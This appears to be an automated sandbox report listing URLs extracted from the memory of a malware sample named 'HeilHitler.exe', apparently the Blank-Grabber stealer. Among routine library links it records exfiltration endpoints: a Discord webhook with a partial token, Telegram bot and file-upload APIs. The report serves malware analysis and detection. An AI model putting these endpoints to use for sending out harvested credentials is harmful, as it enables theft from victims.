              Source: HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0E39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871B6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0E39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000007.00000002.1838904578.0000026DC92AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
              Source: powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679884394.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678337779.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678569630.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680619720.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1677368472.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679315296.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1677584002.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678764252.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: HeilHitler.exe, 00000001.00000002.2026948270.000001BD43481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 00000026.00000002.1824448366.00000287197FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: HeilHitler.exe, 00000001.00000003.2021328315.000001BD43658000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030548396.000001BD4365F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021194278.000001BD43652000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021471863.000001BD4365E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftOWNLO~1.TXTy.
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871B6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
              Source: HeilHitler.exe, 00000001.00000002.2032762896.000001BD43DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: HeilHitler.exe, 00000001.00000003.1689251568.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689605920.000001BD43351000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689683339.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689516521.000001BD43569000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689067447.000001BD4393E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434A6000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1753590052.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: powershell.exe, 00000026.00000002.1830812751.000002871C5C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: HeilHitler.exe, 00000001.00000003.2021033088.000001BD43107000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44544000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000007.00000002.1824453418.0000026DC0C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871D05B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: HeilHitler.exe, rar.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: HeilHitler.exe, 00000001.00000003.1751574081.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1733099301.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1754056720.000001BD436E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
